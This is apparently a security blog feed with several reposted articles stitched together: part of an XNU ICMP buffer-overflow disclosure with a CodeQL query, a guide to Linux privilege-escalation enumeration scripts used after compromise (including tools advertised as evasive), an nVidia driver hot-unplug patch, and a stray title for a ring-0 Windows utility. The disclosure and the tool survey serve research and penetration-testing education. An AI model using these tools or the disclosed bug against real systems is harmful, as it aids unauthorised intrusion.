  2. Do not use public WiFi networks. The attacker needs to be on the same network as the target device. It is not usually possible to send the malicious packet across the internet. For example, I wrote a fake web server which sends back a malicious reply when the target device tries to load a webpage. In my experiments, the malicious packet never arrived, except when the web server was on the same network as the target device.

Proof-of-concept exploit

I have written a proof-of-concept exploit which triggers the vulnerability. To give Apple’s users time to upgrade, I will not publish the source code for the exploit PoC immediately. However, I have made a short video which shows the PoC in action, crashing all the Apple devices on the local network.

The vulnerability

The bug is a buffer overflow in this line of code (bsd/netinet/ip_icmp.c:339):

m_copydata(n, 0, icmplen, (caddr_t)&icp->icmp_ip);

This code is in the function icmp_error. According to the comment, the purpose of this function is to «Generate an error packet of type error in response to bad packet ip». It uses the ICMP protocol to send out the error message. The header of the packet that caused the error is included in the ICMP message, so the purpose of the call to m_copydata on line 339 is to copy the header of the bad packet into the ICMP message. The problem is that the header might be too big for the destination buffer. The destination buffer is an mbuf. An mbuf is a datatype which is used to store both incoming and outgoing network packets. In this code, n is an incoming packet (containing untrusted data) and m is an outgoing ICMP packet. As we will see shortly, icp is a pointer into m. m is allocated on line 294 or line 296:

if (MHLEN > (sizeof(struct ip) + ICMP_MINLEN + icmplen))
  m = m_gethdr(M_DONTWAIT, MT_HEADER);  /* MAC-OK */
else
  m = m_getcl(M_DONTWAIT, MT_DATA, M_PKTHDR);

Slightly further down, on line 314, mtod is used to get m's data pointer:

icp = mtod(m, struct icmp *);

mtod is just a macro, so this line of code does not check that the mbuf is large enough to hold an icmp struct. Furthermore, the data is not copied to icp, but to &icp->icmp_ip, which is at an offset of +8 bytes from icp.
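
To make the +8 offset concrete, here is a simplified, hand-written view of the start of struct icmp; the real definition in netinet/ip_icmp.h uses nested unions, but the offsets are the same:

#include <sys/types.h>
#include <stdint.h>
#include <netinet/in.h>
#include <netinet/ip.h>     /* struct ip */

/* Simplified layout: ICMP_MINLEN (8) bytes of ICMP header, then the copied
 * IP header of the offending packet starting at &icp->icmp_ip. */
struct icmp_simplified {
    uint8_t   icmp_type;    /* offset 0 */
    uint8_t   icmp_code;    /* offset 1 */
    uint16_t  icmp_cksum;   /* offset 2 */
    uint32_t  icmp_hun;     /* offset 4: id/seq, gateway, pptr, ... (a union in the real header) */
    struct ip icmp_ip;      /* offset 8: destination of the m_copydata() call above */
};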

I do not have the necessary tools to be able to step through the XNU kernel in a debugger, so I am actually a little unsure about the exact allocation size of the mbuf. Based on what I see in the source code, I think that m_gethdr creates an mbuf that can hold 88 bytes, but I am less sure about m_getcl. Based on practical experiments, I have found that a buffer overflow is triggered when icmplen >= 84.

At this time, I will not say any more about how the exploit works. I want to give Apple users a chance to upgrade their devices first. However, in the relatively near future I will publish the source code for the exploit PoC in our SecurityExploits repository.

Finding the vulnerability with QL

I found this vulnerability by doing variant analysis on the bug that caused the buffer overflow vulnerability in the packet-mangler. That vulnerability was caused by a call to mbuf_copydata with a user-controlled size argument. So I wrote a simple query to look for similar bugs:

/**
 * @name mbuf copydata with tainted size
 * @description Calling m_copydata with an untrusted size argument
 *              could cause a buffer overflow.
 * @kind path-problem
 * @problem.severity warning
 * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size
 */

import cpp
import semmle.code.cpp.dataflow.TaintTracking
import DataFlow::PathGraph

class Config extends TaintTracking::Configuration {
  Config() { this = "tcphdr_flow" }

  override predicate isSource(DataFlow::Node source) {
    source.asExpr().(FunctionCall).getTarget().getName() = "m_mtod"
  }

  override predicate isSink(DataFlow::Node sink) {
    exists (FunctionCall call
    | call.getArgument(2) = sink.asExpr() and
      call.getTarget().getName().matches("%copydata"))
  }
}

from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "m_copydata with tainted size."

This is a simple taint-tracking query which looks for dataflow from m_mtod to the size argument of a "copydata" function. The function named m_mtod returns the data pointer of an mbuf, so it is quite likely that it will return untrusted data. It is what the mtod macro expands to. Obviously m_mtod is just one of many sources of untrusted data in the XNU kernel, but I have not included any other sources to keep the query as simple as possible. This query returns 9 results, the first of which is the vulnerability in icmp_error. I believe the other 8 results are false positives, but the code is sufficiently complicated that I do not consider them to be bad query results.

Try QL on XNU

Unlike most other open source projects, XNU is not available to query on LGTM. This is because LGTM uses Linux workers to build projects, but XNU can only be built on a Mac. Even on a Mac, XNU is highly non-trivial to build. I would not have been able to do it if I had not found this incredibly useful blog post by Jeremy Andrus. Using Jeremy Andrus’s instructions and scripts, I have manually built snapshots for the three most recent published versions of XNU. You can download the snapshots from these links: 10.13.4, 10.13.5, 10.13.6. Unfortunately, Apple have not yet released the source code for 10.14 (Mojave / iOS 12), so I cannot create a QL snapshot for running queries against it yet. To run queries on these QL snapshots, you will need to download QL for Eclipse. Instructions on how to use QL for Eclipse can be found here.

Timeline

  • 2018-08-09: Privately disclosed to product-security@apple.com. Proof-of-concept exploit included.
  • 2018-08-09: Report acknowledged by product-security@apple.com.
  • 2018-08-20: product-security@apple.com asked me to send them the exact macOS version number and a panic log.
  • 2018-08-20: Returned the requested information to product-security@apple.com. Also sent them a slightly improved version of the exploit PoC.
  • 2018-08-22: product-security@apple.com confirmed that the issue is fixed in the betas of macOS Mojave and iOS 12. However, they also said that they are «investigating addressing this issue on additional platforms» and that they will not disclose the issue until November 2018.
  • 2018-09-17: iOS 12 released by Apple. The vulnerability was fixed.
  • 2018-09-24: macOS Mojave released by Apple. The vulnerability was fixed.
  • 2018-10-30: Vulnerabilities disclosed.

"Send it back"

Credits

  • «I am Error». Screenshot from Zelda II: The Adventure of Link. The screenshot copyright is believed to belong to Nintendo. Image downloaded from wikipedia.
  • «Send it back». By Edward Backhouse.

Linux Privilege Escalation via Automated Script


( Original text by Raj Chandel )

We all know that after compromising a victim’s machine we have a low-privilege shell that we want to escalate into a higher-privileged shell, and this process is known as privilege escalation. In this article we will discuss what comes under privilege escalation and how an attacker can identify whether a low-privilege shell can be escalated to a higher-privileged one. Apart from that, there are some scripts for Linux that may come in useful when trying to escalate privileges on a target system. They are generally aimed at enumeration rather than specific vulnerabilities/exploits, and this type of script can save you a lot of time.

Table of Content

  • Introduction
  • Vectors of Privilege Escalation
  • LinEnum
  • Linuxprivchecker
  • Linux Exploit Suggester 2
  • Bashark
  • BeRoot

Introduction

Basically, privilege escalation is a phase that comes after the attacker has compromised the victim’s machine, in which he tries to gather critical information about the system, such as hidden passwords and weakly configured services or applications. All this information helps the attacker carry out post-exploitation against the machine and obtain a higher-privileged shell.

Vectors of Privilege Escalation

  • OS Detail & Kernel Version
  • Any Vulnerable package installed or running
  • Files and Folders with Full Control or Modify Access
  • File with SUID Permissions
  • Mapped Drives (NFS)
  • Potentially Interesting Files
  • Environment Variable Path
  • Network Information (interfaces, arp, netstat)
  • Running Processes
  • Cronjobs
  • User’s Sudo Right
  • Wildcard Injection

There are several scripts used in penetration testing to quickly identify potential privilege escalation vectors on Linux systems, and today we are going to elaborate on each script that works smoothly.

LinEnum

LinEnum performs scripted local Linux enumeration and privilege escalation checks: it is a shell script that enumerates the system configuration and provides a high-level summary of the checks/tasks it performs.

Privileged access: Diagnoses whether the current user has sudo access without a password, and whether root’s home directory is accessible.

System Information: Hostname, networking details, current IP, etc.

User Information: Current user; lists all users with uid/gid information; lists root accounts; checks whether password hashes are stored in /etc/passwd.

Kernel and distribution release details.

You can download it from its GitHub repository (rebootuser/LinEnum).

Once you download this script, you can simply run it by typing ./LinEnum.sh in a terminal. It will then dump all the fetched data and system details.

Let’s analyse the results it brings us:

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Moreover…..

Super User Accounts: root, demo, hack, raaz

Sudo Rights User: Ignite, raj

Home Directories File Permission

Environment Information

And many more such things which come under post-exploitation.

Linuxprivchecker

Linuxprivchecker enumerates the system configuration and runs some privilege escalation checks as well. It is a Python implementation that suggests exploits specific to the system being assessed. Use wget to download the script from its source URL.

Now to use this script just type python linuxprivchecker.py in a terminal, and it will enumerate file and directory permissions/contents. This script works the same way as LinEnum and hunts for details related to the system, network and users.

Let’s analyse the results it brings us.

OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1

Hostname: Ubuntu

Network Info: Interface, Netstat

Writable Directory and Files for Users other than Root: /home/raj/script/shell.py

Checks if Root’s home folder is accessible

File having SUID/SGID Permission

For example: /bin/raj/asroot.sh, which is a bash script with the SUID permission set.

Linux Exploit Suggester 2

Next-generation exploit suggester based on Linux_Exploit_Suggester. This program performs a ‘uname -r‘ to grab the Linux operating system release version, and returns a list of possible exploits.

This script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments.

Key Improvements Include:

  • More exploits
  • Accurate wildcard matching. This expands the scope of searchable exploits.
  • Output colorization for easy viewing.
  • And more to come

You can use the ‘-k’ flag to manually enter a wildcard for the kernel/operating system release version.

Bashark

Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.

Its Features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris etc.
  • No external dependencies
  • Immune to heuristic and behavioural analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

Execute following command to download it from the github:

 

To execute the script, you need to run the following command:

The help command will let you know all the available options provided by Bashark for post-exploitation.

With the help of the portscan option you can scan the internal network of the compromised machine.

To fetch all configuration files you can use the getconf option. It will pull out all the configuration files stored inside the /etc directory. Similarly, you can use the getprem option to view all binary files on the target’s machine.

BeRoot

The BeRoot Project is a post-exploitation tool that checks common misconfigurations to find a way to escalate privileges. This tool does not perform any exploitation. Its main goal is not to provide a configuration assessment of the host (listing all services, processes, network connections, etc.) but to print only the information that has been found to be a potential way of escalating privileges.

 

To execute the script, you need to run the following command:

It will try to enumerate all possible loopholes that can lead to privilege escalation. As you can observe, the highlighted yellow text represents a weak configuration that can lead to root privilege escalation, whereas the red text represents the technique that can be used to exploit it.

Its functions:

  • Check Files Permissions
  • SUID bin
  • NFS root Squashing
  • Docker
  • Sudo rules
  • Kernel Exploit

Conclusion: The scripts executed above are all available on GitHub and can easily be downloaded from there. These automated scripts try to identify weak configurations that can lead to root privilege escalation.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, social media lover and gadgets enthusiast. Contact here

Patching nVidia GPU driver for hot-unplug on Linux

( original text by @whitequark )

Recently, I’ve using an extremely cursed setup where my XPS 13 9360 laptop is connected to a Sonnet EchoExpress 2 box rewired for Thunderbolt 3 that has an nVidia Quadro 600 GPU, and Linux is set up for render offload to the eGPU and then frame transfer back to iGPU to be displayed on the laptop’s integrated display, which (to my sheer surprise) not only works quire reliably, but even gives me higher FPS in Team Fortress 2 than the iGPU.Картинки по запросу nvidiaThere’s only really one downside: if the eGPU falls off the bus, either because someone™ pulled out the cable, or because the stars didn’t align quite right this morning and it decided to enumerate seemingly at random (sometimes this is preceeded by whining from PCIe AER, sometimes not, I think it’s some sort of hardware issue like a badly inserted PCIe card, but I’m not entirely sure), the nVidia driver… hangs. Hangs quite deliberately, as the sources to the kernel driver show. This leaves the Xorg instance bound to the eGPU hung forever (which confuses bumblebee, but is otherwise not especially bad), and also prevents any new ones from using the eGPU (which is bad).

Anyway, I was kind of annoyed of rebooting every time it happens, so I decided to reboot a few more dozen times instead while patching the driver. This has indeed worked, and left me with something similar to a functional hot-unplug, mildly crippled by the fact that nvidia-modeset is a completely opaque blob that keeps some internal state and tries to act on it, getting stuck when it tries to do something to the now-missing eGPU.

Turns out, there are only a few issues preventing functional hot-unplug.

  1. In nvidia_remove, the driver actually checks if anyone’s still trying to use it, and if yes, it tries to just hang the removal process. This doesn’t actually work, or rather, it mostly works by accident. It starts an infinite loop calling os_schedule() while having taken the NV_LINUX_DEVICES lock. While in the default configuration this indeed hangs any reentrant requests into the driver by virtue of NV_CHECK_PCI_CONFIG_SPACE taking the same lock (in verify_pci_bars), passing the NVreg_CheckPCIConfigSpace=0 module option eliminates that accidental safety mechanism and allows reentrant requests to proceed. They do not crash due to memory being deallocated in nvidia_remove (so you don’t get an unhandled kernel page fault), but they still crash due to being unable to access the GPU.
  2. The NVKMS component (in the nvidia-modeset module) tries to maintain some state, and change it when e.g. the Xorg instance quits and closes the /dev/nvidia-modeset file. Unfortunately, it does not expect the GPU to go away, and first spews a few messages to dmesg similar to nvidia-modeset: ERROR: GPU:0: Failed to query display engine channel state: 0x0000857d:0:0:0x0000000f, after which it appears to hang somewhere inside the blob, which has been conveniently stripped of all symbols. This needs to be prevented, but…
  3. The NVKMS component effectively only exposes a single opaque ioctl, and all the communication, including communication of the GPU bus ID, happens out of band with regards to the open source parts of the nvidia-modeset module. Fortunately, NVKMS calls back into NVRM, and this allows us to associate each /dev/nvidia-modeset fd with the GPU bus ID.
  4. When unloading NVKMS, it also tries to act on its internal state and change the GPU state, which leads to the same hang.

All in all, this allows a patch to be written that detects when a GPU goes away, ignores all further NVKMS requests related to that specific GPU (and returns -ENOENT in response to ioctls, which Xorg appropriately interprets as a fault condition), correctly releases the resources by requesting NVRM, and improperly unloads NVKMS so it doesn’t try to reset the GPU state. (All actual resources should be released by this point, and NVKMS doesn’t have any resource allocation callbacks other than those we already intercept, so in theory this doesn’t have any bad consequences. But I’m not working for nVidia, so this might be completely wrong.)

After the GPU is plugged back in, NVKMS will try to act on its internal state again; in this case, it doesn’t hang, but it doesn’t initialize the GPU correctly either, so the nvidia-modeset kernel module has to be (manually) reloaded. It’s not easy to do this automatically because in a hypothetical system with more than one nVidia GPU the module would still be in use when one of them dies, and so just hard reloading NVKMS would have unfortunate consequences. (Though, I don’t really know whether NVKMS would try to access the dead GPU in response to the request acting on the other GPU anyway. I decided to do it conservatively.) Once it’s reloaded you’re back in the game though!

Here’s the patch, written against the nvidia-legacy-390xx-390.87 Debian source package:

nvidia-hot-gpu-on-gpu-unplug-action.patch (download)
diff -ur original/common/inc/nv-linux.h patchedl/common/inc/nv-linux.h
--- original/common/inc/nv-linux.h	2018-09-23 12:20:02.000000000 +0000
+++ patched/common/inc/nv-linux.h	2018-10-28 07:19:21.526566940 +0000
@@ -1465,6 +1465,7 @@
 typedef struct nv_linux_state_s {
     nv_state_t nv_state;
     atomic_t usage_count;
+    atomic_t dead;
 
     struct pci_dev *dev;
 
diff -ur original/common/inc/nv-modeset-interface.h patched/common/inc/nv-modeset-interface.h
--- original/common/inc/nv-modeset-interface.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-modeset-interface.h	2018-10-28 07:22:00.768238371 +0000
@@ -25,6 +25,8 @@
 
 #include "nv-gpu-info.h"
 
+#include <asm/atomic.h>
+
 /*
  * nvidia_modeset_rm_ops_t::op gets assigned a function pointer from
  * core RM, which uses the calling convention of arguments on the
@@ -115,6 +117,8 @@
 
     int (*set_callbacks)(const nvidia_modeset_callbacks_t *cb);
 
+    atomic_t * (*gpu_dead)(NvU32 gpu_id);
+
 } nvidia_modeset_rm_ops_t;
 
 NV_STATUS nvidia_get_rm_ops(nvidia_modeset_rm_ops_t *rm_ops);
diff -ur original/common/inc/nv-proto.h patched/common/inc/nv-proto.h
--- original/common/inc/nv-proto.h	2018-08-22 00:55:23.000000000 +0000
+++ patched/common/inc/nv-proto.h	2018-10-28 07:20:49.939494812 +0000
@@ -81,6 +81,7 @@
 NvBool      nvidia_get_gpuid_list       (NvU32 *gpu_ids, NvU32 *gpu_count);
 int         nvidia_dev_get              (NvU32, nvidia_stack_t *);
 void        nvidia_dev_put              (NvU32, nvidia_stack_t *);
+atomic_t *  nvidia_dev_dead             (NvU32);
 int         nvidia_dev_get_uuid         (const NvU8 *, nvidia_stack_t *);
 void        nvidia_dev_put_uuid         (const NvU8 *, nvidia_stack_t *);
 int         nvidia_dev_get_pci_info     (const NvU8 *, struct pci_dev **, NvU64 *, NvU64 *);
diff -ur original/nvidia/nv.c patched/nvidia/nv.c
--- original/nvidia/nv.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia/nv.c	2018-10-28 07:48:05.895025112 +0000
@@ -1944,6 +1944,12 @@
     unsigned int i;
     NvBool bRemove = NV_FALSE;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_close called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     NV_CHECK_PCI_CONFIG_SPACE(sp, nv, TRUE, TRUE, NV_MAY_SLEEP());
 
     /* for control device, just jump to its open routine */
@@ -2106,6 +2112,12 @@
     size_t arg_size;
     int arg_cmd;
 
+    if (NV_ATOMIC_READ(nvl->dead))
+    {
+        nv_printf(NV_DBG_ERRORS, "NVRM: nvidia_ioctl called on dead device by pid %d!\n",
+                  current->pid);
+    }
+
     nv_printf(NV_DBG_INFO, "NVRM: ioctl(0x%x, 0x%x, 0x%x)\n",
         _IOC_NR(cmd), (unsigned int) i_arg, _IOC_SIZE(cmd));
 
@@ -3217,6 +3229,7 @@
     NV_INIT_MUTEX(&nvl->ldata_lock);
 
     NV_ATOMIC_SET(nvl->usage_count, 0);
+    NV_ATOMIC_SET(nvl->dead, 0);
 
     if (!rm_init_event_locks(sp, nv))
         return NV_FALSE;
@@ -4018,14 +4031,38 @@
         nv_printf(NV_DBG_ERRORS,
                   "NVRM: Attempting to remove minor device %u with non-zero usage count!\n",
                   nvl->minor_num);
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: YOLO, waiting for usage count to drop to zero\n");
         WARN_ON(1);
 
-        /* We can't continue without corrupting state, so just hang to give the
-         * user some chance to do something about this before reboot */
-        while (1)
+        NV_ATOMIC_SET(nvl->dead, 1);
+
+        /* Insanity check: wait until all clients die, then hope for the best. */
+        while (1) {
+            UNLOCK_NV_LINUX_DEVICES();
             os_schedule();
-    }
+            LOCK_NV_LINUX_DEVICES();
+
+            nvl = pci_get_drvdata(dev);
+            if (!nvl || (nvl->dev != dev))
+            {
+                goto done;
+            }
+
+            if (NV_ATOMIC_READ(nvl->usage_count) == 0)
+            {
+                break;
+            }
+        }
 
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: Usage count is now zero, proceeding to remove the GPU\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: This is not actually supposed to work lol. Hope it does tho 👍\n");
+        nv_printf(NV_DBG_ERRORS,
+                  "NVRM: You probably want to reload nvidia-modeset now if you want any "
+                  "of this to ever start up again, but like, man, that's your choice entirely\n");
+    }
     nv = NV_STATE_PTR(nvl);
     if (nvl == nv_linux_devices)
         nv_linux_devices = nvl->next;
@@ -4712,6 +4749,22 @@
     up(&nvl->ldata_lock);
 }
 
+atomic_t *nvidia_dev_dead(NvU32 gpu_id)
+{
+    nv_linux_state_t *nvl;
+    atomic_t *ret;
+
+    /* Takes nvl->ldata_lock */
+    nvl = find_gpu_id(gpu_id);
+    if (!nvl)
+        return NV_FALSE;
+
+    ret = &nvl->dead;
+    up(&nvl->ldata_lock);
+
+    return ret;
+}
+
 /*
  * Like nvidia_dev_get but uses UUID instead of gpu_id. Note that this may
  * trigger initialization and teardown of unrelated devices to look up their
diff -ur original/nvidia/nv-modeset-interface.c patched/nvidia/nv-modeset-interface.c
--- original/nvidia/nv-modeset-interface.c	2018-08-22 00:55:22.000000000 +0000
+++ patched/nvidia/nv-modeset-interface.c	2018-10-28 07:20:25.959243110 +0000
@@ -114,6 +114,7 @@
         .close_gpu      = nvidia_dev_put,
         .op             = rm_kernel_rmapi_op, /* provided by nv-kernel.o */
         .set_callbacks  = nvidia_modeset_set_callbacks,
+        .gpu_dead       = nvidia_dev_dead,
     };
 
     if (strcmp(rm_ops->version_string, NV_VERSION_STRING) != 0)
diff -ur original/nvidia/nv-reg.h patched/nvidia/nv-reg.h
diff -ur original/nvidia-modeset/nvidia-modeset-linux.c patched/nvidia-modeset/nvidia-modeset-linux.c
--- original/nvidia-modeset/nvidia-modeset-linux.c	2018-09-23 12:20:02.000000000 +0000
+++ patched/nvidia-modeset/nvidia-modeset-linux.c	2018-10-28 07:47:14.738703417 +0000
@@ -75,6 +75,9 @@
 
 static struct semaphore nvkms_lock;
 
+static NvU32 clopen_gpu_id;
+static NvBool leak_on_unload;
+
 /*************************************************************************
  * NVKMS executes queued work items on a single kthread.
  *************************************************************************/
@@ -89,6 +92,9 @@
 struct nvkms_per_open {
     void *data;
 
+    NvU32 gpu_id;
+    atomic_t *gpu_dead;
+
     enum NvKmsClientType type;
 
     union {
@@ -711,6 +717,9 @@
     nvidia_modeset_stack_ptr stack = NULL;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_open_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return NV_FALSE;
     }
@@ -719,6 +728,10 @@
 
     __rm_ops.free_stack(stack);
 
+    if (ret) {
+        clopen_gpu_id = gpuId;
+    }
+
     return ret;
 }
 
@@ -726,12 +739,17 @@
 {
     nvidia_modeset_stack_ptr stack = NULL;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "nvkms_close_gpu called with %08x, pid %d\n",
+           gpuId, current->pid);
+
     if (__rm_ops.alloc_stack(&stack) != 0) {
         return;
     }
 
     __rm_ops.close_gpu(gpuId, stack);
 
+    clopen_gpu_id = gpuId;
+
     __rm_ops.free_stack(stack);
 }
 
@@ -771,8 +789,14 @@
 
     popen->type = type;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_open_common, pid %d\n",
+           current->pid);
+
     *status = down_interruptible(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (*status != 0) {
         goto failed;
     }
@@ -781,6 +805,9 @@
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_open_common, pid %d\n",
+           current->pid);
+
     if (popen->data == NULL) {
         *status = -EPERM;
         goto failed;
@@ -799,10 +826,16 @@
 
     *status = 0;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting in nvkms_open_common, pid %d\n",
+           current->pid);
+
     return popen;
 
 failed:
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "error in nvkms_open_common, pid %d\n",
+           current->pid);
+
     nvkms_free(popen, sizeof(*popen));
 
     return NULL;
@@ -816,14 +849,36 @@
      * mutex.
      */
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_close_common, pid %d\n",
+           current->pid);
+
     down(&nvkms_lock);
 
-    nvKmsClose(popen->data);
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "awwww u need cleanup :3 "
+               "in nvkms_close_common, pid %d\n",
+               current->pid);
+
+        nvkms_close_gpu(popen->gpu_id);
+
+        popen->gpu_id = 0;
+        popen->gpu_dead = NULL;
+
+        leak_on_unload = NV_TRUE;
+    } else {
+        nvKmsClose(popen->data);
+    }
 
     popen->data = NULL;
 
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_close_common, pid %d\n",
+           current->pid);
+
     if (popen->type == NVKMS_CLIENT_KERNEL_SPACE) {
         /*
          * Flush any outstanding nvkms_kapi_event_kthread_q_callback() work
@@ -844,6 +899,9 @@
     }
 
     nvkms_free(popen, sizeof(*popen));
+
+    printk(KERN_INFO NVKMS_LOG_PREFIX "exiting nvkms_close_common, pid %d\n",
+           current->pid);
 }
 
 int NVKMS_API_CALL nvkms_ioctl_common
@@ -855,20 +913,58 @@
     int status;
     NvBool ret;
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "entering nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     status = down_interruptible(&nvkms_lock);
     if (status != 0) {
         return status;
     }
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "taken lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    if (popen->gpu_id != 0 && atomic_read(popen->gpu_dead) != 0) {
+        goto dead;
+    }
+
+    clopen_gpu_id = 0;
+
     if (popen->data != NULL) {
         ret = nvKmsIoctl(popen->data, cmd, address, size);
     } else {
         ret = NV_FALSE;
     }
 
+    if (clopen_gpu_id != 0) {
+        if (!popen->gpu_id) {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x open in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = clopen_gpu_id;
+            popen->gpu_dead = __rm_ops.gpu_dead(clopen_gpu_id);
+        } else {
+            printk(KERN_INFO NVKMS_LOG_PREFIX "detected gpu %08x close in nvkms_ioctl_common, "
+                   "pid %d\n", clopen_gpu_id, current->pid);
+            popen->gpu_id = 0;
+            popen->gpu_dead = NULL;
+        }
+    }
+
     up(&nvkms_lock);
 
+    printk(KERN_INFO NVKMS_LOG_PREFIX "given up lock in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
     return ret ? 0 : -EPERM;
+
+dead:
+    up(&nvkms_lock);
+
+    printk(KERN_ERR NVKMS_LOG_PREFIX "*notices ur gpu is dead* owo whats this "
+           "in nvkms_ioctl_common, pid %d\n",
+           current->pid);
+
+    return -ENOENT;
 }
 
 /*************************************************************************
@@ -1239,9 +1335,14 @@
 
     nvkms_proc_exit();
 
-    down(&nvkms_lock);
-    nvKmsModuleUnload();
-    up(&nvkms_lock);
+    if(leak_on_unload) {
+        printk(KERN_ERR NVKMS_LOG_PREFIX "im just gonna leak all the kms junk ok? "
+               "haha nvm wasnt a question. in nvkms_exit\n");
+    } else {
+        down(&nvkms_lock);
+        nvKmsModuleUnload();
+        up(&nvkms_lock);
+    }
 
     /*
      * At this point, any pending tasks should be marked canceled, but

Here are some handy scripts I was using while debugging it:

insmod.sh
#!/bin/sh -ex
modprobe acpi_ipmi
insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0
insmod nvidia-modeset.ko
dmesg -w
rmmod.sh
#!/bin/sh
rmmod nvidia-modeset
rmmod nvidia
xorg.sh
#!/bin/sh
exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules

And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:

dmesg.log
[  219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  390.87  Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts)
[  219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[  224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560
[  224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560
[  239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a
[  239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus.
[  239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus.
[  239.061398] NVRM: A GPU crash dump has been created. If possible, please run
               NVRM: nvidia-bug-report.sh as root to collect this data before
               NVRM: the NVIDIA kernel module is unloaded.
[  240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count!
[  240.209501] NVRM: YOLO, waiting for usage count to drop to zero
[  241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560
[  241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560
[  241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560
[  250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU
[  250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho 👍
[  250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely
[  250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0
[  250.440950] pci_bus 0000:06: busn_res: [bus 06] is released
[  250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released
[  250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released
[  251.000794] pci_bus 0000:02: Allocating resources
[  251.001324] pci_bus 0000:02: Allocating resources
[  253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0
[  253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
[  253.765976] pcieport 0000:00:1c.0:   device [8086:9d10] error status/mask=00002001/00002000
[  253.765982] pcieport 0000:00:1c.0:    [ 0] Receiver Error         (First)
[  253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3
[  253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3
[  253.846177] pci_bus 0000:03: busn_res: [bus 03] is released
[  253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released
[  253.846300] pci_bus 0000:39: busn_res: [bus 39] is released
[  253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released
[  353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit
[  357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
Xorg.8.log
[   244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210)

R0Ak (The Ring 0 Army Knife) — A Command-Line Utility To Read/Write/Execute Ring Zero on Windows 10 Systems
